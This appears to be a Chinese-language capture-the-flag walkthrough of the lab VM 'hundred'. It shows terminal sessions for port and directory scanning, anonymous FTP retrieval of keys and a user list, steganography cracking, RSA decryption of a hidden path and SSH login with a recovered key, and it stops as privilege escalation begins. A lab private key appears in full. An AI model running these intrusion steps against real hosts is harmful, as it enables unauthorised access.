![\"image-20240424123256581\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404241404804.png\")
<\/div>\n
![\"image-20240424131648331\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404241404806.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ sudo nmap -sS 192.168.0.159\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-24 01:16 EDT\nNmap scan report for hundred (192.168.0.159)\nHost is up (0.000060s latency).\nNot shown: 997 closed tcp ports (reset)\nPORT STATE SERVICE\n21\/tcp open ftp\n22\/tcp open ssh\n80\/tcp open http\nMAC Address: 08:00:27:4E:15:8F (Oracle VirtualBox virtual NIC)\n\nNmap done: 1 IP address (1 host up) scanned in 0.43 seconds\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ rustscan -a 192.168.0.159 -- -A\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.0.159:21\nOpen 192.168.0.159:22\nOpen 192.168.0.159:80\n[~] Starting Script(s)\n[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")\n\n[~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-24 01:17 EDT\nNSE: Loaded 156 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 01:17\nCompleted NSE at 01:17, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 01:17\nCompleted NSE at 01:17, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 01:17\nCompleted NSE at 01:17, 0.00s elapsed\nInitiating Ping Scan at 01:17\nScanning 192.168.0.159 [2 ports]\nCompleted Ping Scan at 01:17, 0.00s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 01:17\nCompleted Parallel DNS resolution of 1 host. at 01:17, 0.00s elapsed\nDNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]\nInitiating Connect Scan at 01:17\nScanning hundred (192.168.0.159) [3 ports]\nDiscovered open port 21\/tcp on 192.168.0.159\nDiscovered open port 22\/tcp on 192.168.0.159\nDiscovered open port 80\/tcp on 192.168.0.159\nCompleted Connect Scan at 01:17, 0.00s elapsed (3 total ports)\nInitiating Service scan at 01:17\nScanning 3 services on hundred (192.168.0.159)\nCompleted Service scan at 01:17, 6.12s elapsed (3 services on 1 host)\nNSE: Script scanning 192.168.0.159.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 01:17\nNSE: [ftp-bounce 192.168.0.159:21] PORT response: 500 Illegal PORT command.\nCompleted NSE at 01:17, 0.70s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 01:17\nCompleted NSE at 01:17, 0.01s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 01:17\nCompleted NSE at 01:17, 0.00s elapsed\nNmap scan report for hundred (192.168.0.159)\nHost is up, received syn-ack (0.00046s latency).\nScanned at 2024-04-24 01:17:02 EDT for 7s\n\nPORT STATE SERVICE REASON VERSION\n21\/tcp open ftp syn-ack vsftpd 3.0.3\n| ftp-syst: \n| STAT: \n| FTP server status:\n| Connected to ::ffff:192.168.0.143\n| Logged in as ftp\n| TYPE: ASCII\n| No session bandwidth limit\n| Session timeout in seconds is 300\n| Control connection is plain text\n| Data connections will be plain text\n| At session startup, client count was 1\n| vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n| -rwxrwxrwx 1 0 0 435 Aug 02 2021 id_rsa [NSE: writeable]\n| -rwxrwxrwx 1 1000 1000 1679 Aug 02 2021 id_rsa.pem [NSE: writeable]\n| -rwxrwxrwx 1 1000 1000 451 Aug 02 2021 id_rsa.pub [NSE: writeable]\n|_-rwxrwxrwx 1 0 0 187 Aug 02 2021 users.txt [NSE: writeable]\n22\/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n| 2048 ef:28:1f:2a:1a:56:49:9d:77:88:4f:c4:74:56:0f:5c (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDbKM571Elw344\/eLnr7NhTAOVHtqhEITrCuF0mFc5\/ZiSN54vnhfTrt6JW8mj09y8vOTbsC+nhdoC6vFFGHAesozqQcndm3LXzwz4yIujhaF3IljcS0hdKGniUY1\/sHW680oixdOEHQT8cSeEosAVNc1To4YwNo1hYUsuhbNtD\/dG4WIIybOHeWgUrEHfnu4Q+Q7K3kevOy3b4aSZfc43Qa7nezkrjzRH3iy5tyMQV5SWdow4Jb25z3zqJCBVdB0UkYWzB0scx95N9OSh5g\/Ph799VKKgtkfyBNEyPTQ7mbK1ZwsPTWOCAHB33Y4j+rgQ9DREgZsNtU0KBbU9Bu8Sd\n| 256 1d:8d:a0:2e:e9:a3:2d:a1:4d:ec:07:41:75:ce:47:0e (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHJc9irXjsz0dU9g6bOq6koDsj8BPZ30XoWjK\/E9M+mZ6gJdPlnEVvd9KHiRP+QiPjc1NZfVbIUy4RiX\/ev1Iw8=\n| 256 06:80:3b:fc:c5:f7:7d:c5:58:26:83:c4:f7:7e:a3:d9 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEAOTtpmhQ63cGzZAoANc8fAevbCpwQ7q8ymO+TP7Gp\/\n80\/tcp open http syn-ack nginx 1.14.2\n|_http-server-header: nginx\/1.14.2\n| http-methods: \n|_ Supported Methods: GET HEAD\n|_http-title: Site doesn't have a title (text\/html).\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 01:17\nCompleted NSE at 01:17, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 01:17\nCompleted NSE at 01:17, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 01:17\nCompleted NSE at 01:17, 0.00s elapsed\nRead data files from: \/usr\/bin\/..\/share\/nmap\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 7.47 seconds<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.159\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/192.168.0.159\/\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: jpg,txt,html,php,zip,bak\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.html (Status: 200) [Size: 242]\n\/logo.jpg (Status: 200) [Size: 7277]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n
![\"image-20240424131909417\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u67e5\u770b\u6e90\u4ee3\u7801\uff1a<\/p>\n
<style>\n.center {\n display: block;\n margin-left: auto;\n margin-right: auto;\n key: h4ckb1tu5.enc;\n width: 50%;\n}\n<\/style>\n\n<img src="logo.jpg" class="center"> \n<h1>Thank you ALL!<\/h1>\n<h1>100 f*cking VMs!!<\/h1>\n\n<!-- l4nr3n, nice dir.--><\/code><\/pre>\n\u53d1\u73b0\u654f\u611f\u76ee\u5f55\uff1al4nr3n<\/code>\u4ee5\u53ca\u5bc6\u94a5h4ckb1tu5.enc<\/code><\/p>\n\u654f\u611f\u670d\u52a1\u63a2\u6d4b<\/h3>\n
\u5c1d\u8bd5ftp<\/code>\u533f\u540d\u767b\u5f55\u4e00\u4e0b\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ ftp 192.168.0.159 \nConnected to 192.168.0.159.\n220 (vsFTPd 3.0.3)\nName (192.168.0.159:kali): ftp\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> pwd\nRemote directory: \/\nftp> ls -la\n229 Entering Extended Passive Mode (|||42789|)\n150 Here comes the directory listing.\ndrwxr-xr-x 2 0 113 4096 Aug 02 2021 .\ndrwxr-xr-x 2 0 113 4096 Aug 02 2021 ..\n-rwxrwxrwx 1 0 0 435 Aug 02 2021 id_rsa\n-rwxrwxrwx 1 1000 1000 1679 Aug 02 2021 id_rsa.pem\n-rwxrwxrwx 1 1000 1000 451 Aug 02 2021 id_rsa.pub\n-rwxrwxrwx 1 0 0 187 Aug 02 2021 users.txt\n226 Directory send OK.\nftp> get users.txt\nlocal: users.txt remote: users.txt\n229 Entering Extended Passive Mode (|||61643|)\n150 Opening BINARY mode data connection for users.txt (187 bytes).\n100% |***********************************************************************************************************| 187 7.78 KiB\/s 00:00 ETA\n226 Transfer complete.\n187 bytes received in 00:00 (7.58 KiB\/s)\nftp> get id_rsa\nlocal: id_rsa remote: id_rsa\n229 Entering Extended Passive Mode (|||43755|)\n150 Opening BINARY mode data connection for id_rsa (435 bytes).\n100% |***********************************************************************************************************| 435 12.69 KiB\/s 00:00 ETA\n226 Transfer complete.\n435 bytes received in 00:00 (12.48 KiB\/s)\nftp> get id_rsa.pem\nlocal: id_rsa.pem remote: id_rsa.pem\n229 Entering Extended Passive Mode (|||20649|)\n150 Opening BINARY mode data connection for id_rsa.pem (1679 bytes).\n100% |***********************************************************************************************************| 1679 1.86 MiB\/s 00:00 ETA\n226 Transfer complete.\n1679 bytes received in 00:00 (1.12 MiB\/s)\nftp> get id_rsa.pub\nlocal: id_rsa.pub remote: id_rsa.pub\n229 Entering Extended Passive Mode (|||36855|)\n150 Opening BINARY mode data connection for id_rsa.pub (451 bytes).\n100% |***********************************************************************************************************| 451 764.63 KiB\/s 00:00 ETA\n226 Transfer complete.\n451 bytes received in 00:00 (470.54 KiB\/s)\nftp> exit\n221 Goodbye.<\/code><\/pre>\n\u770b\u4e00\u4e0b\u6709\u4e9b\u5565\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ ls -la\ntotal 24\ndrwxr-xr-x 2 kali kali 4096 Apr 24 01:20 .\ndrwxr-xr-x 66 kali kali 4096 Apr 24 01:16 ..\n-rw-r--r-- 1 kali kali 435 Aug 2 2021 id_rsa\n-rw-r--r-- 1 kali kali 1679 Aug 2 2021 id_rsa.pem\n-rw-r--r-- 1 kali kali 451 Aug 2 2021 id_rsa.pub\n-rw-r--r-- 1 kali kali 187 Aug 2 2021 users.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ cat id_rsa \n \/ \\\n \/ _ \\\n | \/ \\ |\n || || _______\n || || |\\ \\\n || || ||\\ \\\n || || || \\ |\n || || || \\__\/\n || || || ||\n \\\\_\/ \\_\/ \\_\/\/\n \/ _ _ \\\n \/ \\\n | O O |\n | \\ ___ \/ | \n \/ \\ \\_\/ \/ \\\n\/ ----- | --\\ \\\n| \\__\/|\\__\/ \\ |\n\\ |_|_| \/\n \\_____ _____\/\n \\ \/\n | |\n-------------------------\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ cat id_rsa.pem \n-----BEGIN RSA PRIVATE KEY-----\nMIIEpAIBAAKCAQEAwsrHORyA+mG6HS9ZmZwzPmKHrHhA0\/kKCwNjUG8rmPVupv73\nmUsewpoGvYB9L9I7pUAsMscAb5MVo89d4b0z2RnXDD1fh6mKlTJmcNwWCnA1PgD+\nOwqewshpkCBhCV6O2P6dktfA8UI\/uqF6uT4QISU4ksriN16cOm\/89jHadetB8dCe\nh3Rx6HrFNccY8aiDRSA9meqz7YGE2+lJ\/NtwtndUkzzxKxuKC6z4gG780tZHhg83\nxVwZ9bxPyHfGqHWmV4yGsAgp7mot7pg9VzffnP6DAVnbReDDbhNLcnfVXEkBv8SQ\nL7OFIiKxJpoa1ADqGffA5LOPFdYKbbCFMictQQIDAQABAoIBAE4Q6IDp\/ILcEbPK\nmzUl1Z+l60visdCCGVVKmU3OEAHwMtV4j5B++6fwBM2Dpig5MDBNJKmA+Zq9rsmE\nvNJQemwCoB3Gpvd+qgybM1T9z1OFnsDnsvvEiNX1beEWKO2RWNx8RnhoQWovK81H\nFCETT3GJMkAaUUjxgNkmspGUb0IcP4YR61jpNy8thMLz8FQV8XqNSf4DSd9+8wrm\nFBFDFzso6zcBtsY6\/nDueaVfLsequU1Fdhh3itC6rPXync\/EWN0HJtaiKEVAytYE\ncvl1hVpRVhGZGjPqNQSPcknO0K2b22anRoiSpBoCzaopbSZHySFgcZM8oxGgw35j\nYpS1ULUCgYEA+1Se5s4AzsOX\/3RRwwF9Was\/\/oHU1N2JnJRetF9tjeFu8MEMnSec\na3bcPy+CZHB8oVnoyh647IObzPUjCgMxdyTLdfGmQ8RgzXhwYeQRe+ethrT\/Ra26\n7m+R+3838k5ZTKnwjBPreV\/i2AmwZYDPT2S5q5b7m5Cr4QTfsaScaKsCgYEAxmk\/\nxzu2XO8YmE+8R62nWdLPMaj4E5IPkT3uCA8G24KGSSyK29OGZ02RI8qxWkdqMxKJ\nrTDrQJ\/4oU6108Vhay0tyFswbNn0ymlHAhPKxXNr0xHkC6rCnDEnn6W7bspTxxyk\n9OUtl2UemtnEKRm3qu9Rc1qLFW0\/Zhxw3ovgWcMCgYEAka6HPPoD9dXicSyXiBWA\n900QlxHisFCJx70o+ByogClACUWdbirbvF71Y5rCVj3twAlBqocMYewXj0I4wUEA\nlzM4zHD6EyXthqxdWCC\/EbdFGmQn49fEFxmM4N7pKwbHNGz9BfU19PDjqJ5VJUD4\n6ehUx2WJCq9dMd2FXI8yKmkCgYAMBBnBtiMQM8a4irOrX5\/v961mo4YKoWDh+e8t\ne8N9jcUWL2VldMUCApeUpFTjU8nht\/CwlXLZ4hZLppmqbpy8weqw5JzlKroBfCi5\nvnscRCY2jTHTZw8MKInuyDm2tvgl6d0vm6WMMqqM1D1mA9G0v3OeWdBshsY9J+HK\nCIyYwwKBgQDEXoZ+lZKyPUBSgcE+b52U2Dj9GAPKPUDZpsCbUebftZknOk\/HelF1\nwiWWDjni1ILVSfWIR4\/nvosJPa+39WDv+dFt3bJdcUA3SL2acW3MGVPC6abZWwSo\nizXrZm8h0ZSuXyU\/uuT3BCJt77HyN2cPZrqccPwanS9du6zrX0u2yQ==\n-----END RSA PRIVATE KEY-----\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ cat id_rsa.pub \n-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwsrHORyA+mG6HS9ZmZwz\nPmKHrHhA0\/kKCwNjUG8rmPVupv73mUsewpoGvYB9L9I7pUAsMscAb5MVo89d4b0z\n2RnXDD1fh6mKlTJmcNwWCnA1PgD+OwqewshpkCBhCV6O2P6dktfA8UI\/uqF6uT4Q\nISU4ksriN16cOm\/89jHadetB8dCeh3Rx6HrFNccY8aiDRSA9meqz7YGE2+lJ\/Ntw\ntndUkzzxKxuKC6z4gG780tZHhg83xVwZ9bxPyHfGqHWmV4yGsAgp7mot7pg9Vzff\nnP6DAVnbReDDbhNLcnfVXEkBv8SQL7OFIiKxJpoa1ADqGffA5LOPFdYKbbCFMict\nQQIDAQAB\n-----END PUBLIC KEY-----\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ cat users.txt \n--- SNIP ---\nnoname\nroelvb\nch4rm\nmarcioapm\nisen\nsys7em\nchicko\ntasiyanci\nluken\nalienum\nlinked\ntatayoyo\n0xr0n1n\nexploiter\nkanek180\ncromiphi\nsoftyhack\nb4el7d\nval1d\n--- SNIP ---\n\nThanks!\nhmv<\/code><\/pre>\n\u654f\u611f\u76ee\u5f55<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ wget http:\/\/192.168.0.159\/logo.jpg \n--2024-04-24 01:29:09-- http:\/\/192.168.0.159\/logo.jpg\nConnecting to 192.168.0.159:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 7277 (7.1K) [image\/jpeg]\nSaving to: \u2018logo.jpg\u2019\n\nlogo.jpg 100%[=========================================================================>] 7.11K --.-KB\/s in 0s \n\n2024-04-24 01:29:09 (892 MB\/s) - \u2018logo.jpg\u2019 saved [7277\/7277]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ stegseek -wl \/usr\/share\/wordlists\/rockyou.txt logo.jpg \nStegSeek 0.6 - https:\/\/github.com\/RickdeJager\/StegSeek\n\n[i] Progress: 99.94% (133.4 MB) \n[!] error: Could not find a valid passphrase.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ stegseek -wl users.txt logo.jpg \nStegSeek 0.6 - https:\/\/github.com\/RickdeJager\/StegSeek\n\n[i] Found passphrase: "cromiphi"\n[i] Original filename: "toyou.txt".\n[i] Extracting to "logo.jpg.out".\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ cat logo.jpg.out \nd4t4s3c#1<\/code><\/pre>\n\u7136\u540e\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ curl http:\/\/192.168.0.159\/l4nr3n \n<html>\n<head><title>404 Not Found<\/title><\/head>\n<body bgcolor="white">\n<center><h1>404 Not Found<\/h1><\/center>\n<hr><center>nginx\/1.14.2<\/center>\n<\/body>\n<\/html><\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ wget http:\/\/192.168.0.159\/h4ckb1tu5.enc \n--2024-04-24 01:31:06-- http:\/\/192.168.0.159\/h4ckb1tu5.enc\nConnecting to 192.168.0.159:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 256 [application\/octet-stream]\nSaving to: \u2018h4ckb1tu5.enc\u2019\n\nh4ckb1tu5.enc 100%[=========================================================================>] 256 --.-KB\/s in 0s \n\n2024-04-24 01:31:06 (65.8 MB\/s) - \u2018h4ckb1tu5.enc\u2019 saved [256\/256]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ cat h4ckb1tu5.enc \n\ufffdJzU(}\ufffdD\ufffdH\ufffd\ufffd\ufffd\ufffd\ufffd\u04ca\ufffd\ufffdTfV\ufffd\ufffd\ufffd\u00f5\ufffdH\ufffd\ufffd\ufffdaL\ufffd$\ufffd\ufffdEq\ufffd2\ufffd)]`J\ufffd\ufffd\ufffd2H\ufffd\u067d~\ufffd\ufffd\ufffd\ufffd;2\ufffd"\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\n 0l\n \ufffdu\ufffdk\n \ufffd\ufffd\ufffdUl\ufffd\ufffd.C\ufffd1\ufffdQ\ufffdR\ufffdW\u03b4\ufffdj>\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\n\ufffd\u02f4\u059a}\ufffd\ufffdK\ufffd\ufffd\ufffd\ufffdJ\ufffd\ufffd\ufffd\ufffd\ufffdi[?\ufffd\ufffd\ufffd\ufffd$\ufffd\u070e"\n \ufffd\ufffd\ufffdx\ufffd\ufffd\ufffd\ufffdJ\ufffd\ufffd\ufffd\ufffd\ufffd=q\ufffdZq\ufffd\ufffd4!\ufffdK\ufffd\ufffde\ufffdP\n J{\ufffd\ufffdQ\ufffd\ufffd\ufffd\ufffd3\ufffdm\ufffdQ\ufffd\ufffdJ\ufffd\ufffd_)\ufffd\u0676\ufffdZ <\/code><\/pre>\n\u5f97\u5230\u5bc6\u94a5\uff0c\u5c1d\u8bd5\u89e3\u5bc6\u4e00\u4e0b\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\n\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ openssl rsautl -decrypt -in h4ckb1tu5.enc -out decrypto.txt -inkey id_rsa.pem\nThe command rsautl was deprecated in version 3.0. Use 'pkeyutl' instead.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ openssl pkeyutl -decrypt -in h4ckb1tu5.enc -out decrypto.txt -inkey id_rsa.pem \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ cat decrypto.txt \n\/softyhackb4el7dshelldredd<\/code><\/pre>\n\u5f97\u5230\u4e86\u4e00\u4e2a\u654f\u611f\u76ee\u5f55\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ curl http:\/\/192.168.0.159\/softyhackb4el7dshelldredd\n<html>\n<head><title>301 Moved Permanently<\/title><\/head>\n<body bgcolor="white">\n<center><h1>301 Moved Permanently<\/h1><\/center>\n<hr><center>nginx\/1.14.2<\/center>\n<\/body>\n<\/html>\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ curl http:\/\/192.168.0.159\/softyhackb4el7dshelldredd\/\nHi boss.\nIs there --> ...<\/code><\/pre>\n\u626b\u63cf\u65b0\u76ee\u5f55<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ sudo dirsearch -u http:\/\/192.168.0.159\/softyhackb4el7dshelldredd\/ -e* -i 200,300-399 2>\/dev\/null\n[sudo] password for kali: \n\n _|. _ _ _ _ _ _|_ v0.4.3\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594\n\nOutput File: \/home\/kali\/temp\/hundred\/reports\/http_192.168.0.159\/_softyhackb4el7dshelldredd__24-04-24_01-38-58.txt\n\nTarget: http:\/\/192.168.0.159\/\n\n[01:38:58] Starting: softyhackb4el7dshelldredd\/\n[01:39:22] 200 - 2KB - \/softyhackb4el7dshelldredd\/id_rsa\n\nTask Completed<\/code><\/pre>\n\u5bc6\u94a5\u767b\u5f55<\/h3>\n
\u4e0b\u8f7d\u4e0b\u6765\uff0c\u5c1d\u8bd5\u4f7f\u7528\u5bc6\u94a5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ wget http:\/\/192.168.0.159\/softyhackb4el7dshelldredd\/id_rsa\n--2024-04-24 01:42:34-- http:\/\/192.168.0.159\/softyhackb4el7dshelldredd\/id_rsa\nConnecting to 192.168.0.159:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 1876 (1.8K) [application\/octet-stream]\nSaving to: \u2018id_rsa.1\u2019\n\nid_rsa.1 100%[=========================================================================>] 1.83K --.-KB\/s in 0s \n\n2024-04-24 01:42:34 (331 MB\/s) - \u2018id_rsa.1\u2019 saved [1876\/1876]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ ssh hmv@192.168.0.159 -i id_rsa \nThe authenticity of host '192.168.0.159 (192.168.0.159)' can't be established.\nED25519 key fingerprint is SHA256:CiCK\/UJWUULl80syMwfpY3+G25hq7fX\/xTkHA61y2Ws.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added '192.168.0.159' (ED25519) to the list of known hosts.\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@ WARNING: UNPROTECTED PRIVATE KEY FILE! @\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\nPermissions 0644 for 'id_rsa' are too open.\nIt is required that your private key files are NOT accessible by others.\nThis private key will be ignored.\nLoad key "id_rsa": bad permissions\nhmv@192.168.0.159's password: \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ chmod 600 id_rsa\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ ssh hmv@192.168.0.159 -i id_rsa\nLoad key "id_rsa": error in libcrypto\nhmv@192.168.0.159's password: \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ vim id_rsa \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ cat id_rsa \n \/ \\\n \/ _ \\\n | \/ \\ |\n || || _______\n || || |\\ \\\n || || ||\\ \\\n || || || \\ |\n || || || \\__\/\n || || || ||\n \\\\_\/ \\_\/ \\_\/\/\n \/ _ _ \\\n \/ \\\n | O O |\n | \\ ___ \/ | \n \/ \\ \\_\/ \/ \\\n\/ ----- | --\\ \\\n| \\__\/|\\__\/ \\ |\n\\ |_|_| \/\n \\_____ _____\/\n \\ \/\n | |\n-------------------------\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ ls -la\ntotal 52\ndrwxr-xr-x 3 kali kali 4096 Apr 24 01:44 .\ndrwxr-xr-x 66 kali kali 4096 Apr 24 01:16 ..\n-rw-r--r-- 1 kali kali 27 Apr 24 01:35 decrypto.txt\n-rw-r--r-- 1 kali kali 256 Aug 2 2021 h4ckb1tu5.enc\n-rw------- 1 kali kali 435 Apr 24 01:44 id_rsa\n-rw-r--r-- 1 kali kali 1876 Aug 2 2021 id_rsa.1\n-rw-r--r-- 1 kali kali 1679 Aug 2 2021 id_rsa.pem\n-rw-r--r-- 1 kali kali 451 Aug 2 2021 id_rsa.pub\n-rw-r--r-- 1 kali kali 7277 Aug 2 2021 logo.jpg\n-rw-r--r-- 1 kali kali 10 Apr 24 01:41 logo.jpg.out\ndrwxr-xr-x 3 root root 4096 Apr 24 01:38 reports\n-rw-r--r-- 1 kali kali 187 Aug 2 2021 users.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ chmod 600 id_rsa.1 \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hundred]\n\u2514\u2500$ ssh hmv@192.168.0.159 -i id_rsa.1\nEnter passphrase for key 'id_rsa.1': \nLinux hundred 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Mon Aug 2 06:43:27 2021 from 192.168.1.51\nhmv@hundred:~$ whoami;id\nhmv\nuid=1000(hmv) gid=1000(hmv) groups=1000(hmv),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)<\/code><\/pre>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\nhmv@hundred:~$ whoami;id\nhmv\nuid=1000(hmv) gid=1000(hmv) 